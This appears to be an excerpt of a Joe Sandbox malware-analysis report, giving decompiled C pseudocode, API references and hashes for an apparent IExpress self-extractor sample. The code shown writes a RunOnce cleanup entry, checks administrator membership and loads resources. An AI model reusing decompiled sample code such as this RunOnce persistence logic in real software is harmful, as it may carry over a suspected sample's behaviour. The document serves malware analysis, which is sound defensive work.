                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE28A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00DE28AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00DE28B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00DE27E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: a5f2ac8d7f89aabb3a3ed6c74837a5560af6b849d060890bf2b4c434cbd1f9e1
                                                                                                                                                                                                        • Instruction ID: 26cd7aa68e16ccdb9d816667f6c9a1fc5b151f158e1e20abd70e8465bdffb520
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5f2ac8d7f89aabb3a3ed6c74837a5560af6b849d060890bf2b4c434cbd1f9e1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D41A271A002ACAFDB24BB659CC5AFE7BBDEB55700F0440A9F549D2204DB709E858FB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E00DE2267() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v836;
                                                                                                                                                                                                        				void* _v840;
                                                                                                                                                                                                        				int _v844;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                        				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                        				if( *0xde8530 != 0) {
                                                                                                                                                                                                        					_push(_t49);
                                                                                                                                                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                                                        						_v844 = 0x238;
                                                                                                                                                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                        							_push(_t47);
                                                                                                                                                                                                        							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        								E00DE658A( &_v268, 0x104, 0xde1140);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        							E00DE171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                        							_t42 =  &_v836;
                                                                                                                                                                                                        							_t45 = _t42 + 1;
                                                                                                                                                                                                        							_pop(_t47);
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t33 =  *_t42;
                                                                                                                                                                                                        								_t42 = _t42 + 1;
                                                                                                                                                                                                        							} while (_t33 != 0);
                                                                                                                                                                                                        							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                        						_pop(_t38);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_pop(_t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00DE22A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 00DE22D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE22F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00DE2305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00DE236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00DE237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00DE2321
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00DE232D
                                                                                                                                                                                                        • wextract_cleanup3, xrefs: 00DE227C, 00DE22CD, 00DE2363
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00DE2299
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
                                                                                                                                                                                                        • API String ID: 3027380567-2228382463
                                                                                                                                                                                                        • Opcode ID: 5cb4a86614b1ed7a7429f69a392ac55054dcc7c2a1ebd3e837bf941ed028174d
                                                                                                                                                                                                        • Instruction ID: 5226c95abbcb9bc541b4a2e40042fce832e13bf7f1641591bf2322cb9f7dd134
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cb4a86614b1ed7a7429f69a392ac55054dcc7c2a1ebd3e837bf941ed028174d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2031C871A003986BDB21BB56DC89FEA7B7CEB14740F0401E9B50DEA151DA71AF88CE70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E00DE3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        				struct HWND__* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = _a8 - 0xf;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					if( *0xde8590 == 0) {
                                                                                                                                                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                        						 *0xde8590 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t8 - 1;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        					EndDialog(_a4, ??);
                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t15 = _t11 - 0x100;
                                                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                                                        					_t16 = GetDesktopWindow();
                                                                                                                                                                                                        					_t33 = _a4;
                                                                                                                                                                                                        					E00DE43D0(_t33, _t16);
                                                                                                                                                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xde8d4c);
                                                                                                                                                                                                        					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                        					SetForegroundWindow(_t33);
                                                                                                                                                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                        					 *0xde88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00DE30C0);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t15 != 1) {
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a12 != 6) {
                                                                                                                                                                                                        					if(_a12 != 7) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00DE313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00DE314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00DE316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00DE3176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00DE317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 00DE3185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00DE3190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,00DE30C0), ref: 00DE31A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00DE31CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 3785188418-3940384054
                                                                                                                                                                                                        • Opcode ID: 512e4f170e5b94243d205b898023a9dbe2d422e3ce3f8c7deb31cfb9bdc3c7b3
                                                                                                                                                                                                        • Instruction ID: 6deb667a0cf55196f4c47ffb552bc7caff76804e1b10bc22e89e8d184a3e0a1b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 512e4f170e5b94243d205b898023a9dbe2d422e3ce3f8c7deb31cfb9bdc3c7b3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E11E4316043D2BFDB117F299C8CB6A3A64EB46721F050618F925EA2E0DB70A641D776
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E00DE18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t51 = __esi;
                                                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                                                        				_t23 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                        				_t25 =  *0xde8128; // 0x2
                                                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t50 = 2;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if(_t25 != _t50) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					return E00DE6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E00DE17EE( &_v20) != 0) {
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                                                        						 *0xde8128 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                        					CloseHandle(_v28);
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_pop(_t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                        						LocalFree(_t52);
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if( *_t52 <= 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							FreeSid(_v32);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                        						_t50 = _t15;
                                                                                                                                                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                                                        							_t50 = _t50 + 8;
                                                                                                                                                                                                        							if(_t45 <  *_t52) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xde8128 = 1;
                                                                                                                                                                                                        						_v20 = 1;
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00DE18DD), ref: 00DE181A
                                                                                                                                                                                                          • Part of subcall function 00DE17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00DE182C
                                                                                                                                                                                                          • Part of subcall function 00DE17EE: AllocateAndInitializeSid.ADVAPI32(00DE18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DE18DD), ref: 00DE1855
                                                                                                                                                                                                          • Part of subcall function 00DE17EE: FreeSid.ADVAPI32(?,?,?,?,00DE18DD), ref: 00DE1883
                                                                                                                                                                                                          • Part of subcall function 00DE17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00DE18DD), ref: 00DE188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00DE18EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00DE18F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00DE190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00DE1918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00DE192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00DE1944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00DE1964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00DE197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00DE199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00DE19A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00DE19AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: 43da989e18ecbbbdab4cb4aabfb68793f8cadac0873cf466a712c695c8e07e1a
                                                                                                                                                                                                        • Instruction ID: cad2ad8cd72d8d99e37ccb90563ae0bbfffffe7657c990c3a89f820fe4948fee
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43da989e18ecbbbdab4cb4aabfb68793f8cadac0873cf466a712c695c8e07e1a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F313C75A0038AAFDB10AFAADC88AAFBBB8FF04710F140429E555E6255D7309905DB71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00DE468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				CHAR* _t14;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                        				_t16 = _t4;
                                                                                                                                                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                        					FreeResource(_t15);
                                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$cent
                                                                                                                                                                                                        • API String ID: 3370778649-3553536280
                                                                                                                                                                                                        • Opcode ID: 677f80fc7caded529a1c0c02db20c3d87246ad70798966e3cb74b279d51362b1
                                                                                                                                                                                                        • Instruction ID: 56d213993948d3f96aad8a8171509afa4995e400cc47b71457adf07eef7d6dc6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 677f80fc7caded529a1c0c02db20c3d87246ad70798966e3cb74b279d51362b1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7201A9362443917BE7203BAA5C8DF6B7E2CDFC6F61F094018FA49DB290C9719C4186B6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E00DE17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                        					_v20 = _t20;
                                                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                                                        						 *_t37 = 0;
                                                                                                                                                                                                        						_t28 = 1;
                                                                                                                                                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                        							_t37 = _t39;
                                                                                                                                                                                                        							 *0xdea288(0, _v24, _v28);
                                                                                                                                                                                                        							_v20();
                                                                                                                                                                                                        							if(_t39 != _t39) {
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							FreeSid(_v24);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t36);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00DE18DD), ref: 00DE181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00DE182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00DE18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DE18DD), ref: 00DE1855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,00DE18DD), ref: 00DE1883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00DE18DD), ref: 00DE188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
